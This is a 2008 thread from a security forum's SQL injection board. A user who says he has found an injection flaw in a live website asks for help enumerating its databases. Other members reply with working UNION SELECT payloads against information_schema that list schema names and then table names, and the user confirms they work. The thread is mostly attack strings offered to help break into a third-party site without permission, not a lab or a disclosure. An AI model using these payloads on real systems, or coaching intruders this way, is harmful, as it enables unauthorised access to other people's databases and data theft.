| 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | Help with SQL inj ? |  |  
	| 
	
		|  Posted: Fri Mar 07, 2008 3:06 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| nox |  | Advanced user |  |  
  |  |  |  | Joined: Dec 29, 2007 |  | Posts: 100 |  | Location: c://windows/system32 |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| hey to all , so i have find a exploit SQL injection in a website ,i'am root i can access in Mysql.user and , the version of Mysql is 5.x.x
 
 and i'am trying to find all tables name, by
 
 
  	  | Code: |  	  | -1+union+select+table_name+from+information_schema.tables+limit+by+x,y/* | 
 is working 100%
 
 so i want to know all DB Name by Mysql.db/*
 so , i try with this :
 
 
  	  | Code: |  	  | -1+union+select+db+from+mysql.db/* | 
 
 my problem is just one DB has been Displayed
 i find just this :
 
 'test'
 
 and this :
 
  	  | Code: |  	  | -1+union+select+database()+from+mysql.db/* | 
 i find :
 
 'biblithese'
 
 
 so , how i can find all other DB name ,and thankx lot of ..
 |  |  
		| 
		
			| _________________
 ..::::[  Waraxe.us is the BEST and the TOP  ]::::..
 |  |  |  
	|  |  
	| 
	
		|  Posted: Fri Mar 07, 2008 3:49 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Try this: 
 
  	  | Code: |  	  | -1+UNION+SELECT+SCHEMA_NAME+FROM+INFORMATION_SCHEMA.SCHEMATA+LIMIT+2,1--+
 
 | 
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Fri Mar 07, 2008 4:47 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| nox |  | Advanced user |  |  
  |  |  |  | Joined: Dec 29, 2007 |  | Posts: 100 |  | Location: c://windows/system32 |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Thank You waraxe  , working 100% , but how i know all tables & column Name of DB example  'test'  , how ? 
 and thank you
  |  |  
		| 
		
			| _________________
 ..::::[  Waraxe.us is the BEST and the TOP  ]::::..
 |  |  |  
	|  |  
	| 
	
		|  Posted: Sat Mar 08, 2008 7:11 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| nox |  | Advanced user |  |  
  |  |  |  | Joined: Dec 29, 2007 |  | Posts: 100 |  | Location: c://windows/system32 |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Waraxe , i need an answer , please  ? so ? |  |  
		| 
		
			| _________________
 ..::::[  Waraxe.us is the BEST and the TOP  ]::::..
 |  |  |  
	|  |  
	| 
	
		|  Posted: Sat Mar 08, 2008 7:21 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| maku234 |  | Regular user |  |  
  |  |  |  | Joined: Jun 03, 2007 |  | Posts: 21 |  | Location: estonia |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| 1+union+select+table_name+from+information_schema.tables+where+TABLE_SCHEMA=test+limit+by+x,y/* 
 I'am not sure that it works.
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Mar 09, 2008 6:43 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| nox |  | Advanced user |  |  
  |  |  |  | Joined: Dec 29, 2007 |  | Posts: 100 |  | Location: c://windows/system32 |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| thank you maku234  , it work but by [ '' ] 
 
 
  	  | Code: |  	  | 1+union+select+table_name+from+information_schema.tables+where+TABLE_SCHEMA='test'+limit+by+x,y/* | 
 
 thankx lot ...
  |  |  
		| 
		
			| _________________
 ..::::[  Waraxe.us is the BEST and the TOP  ]::::..
 |  |  |  
	|  |  
	| www.waraxe.us Forum Index -> Sql injection 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |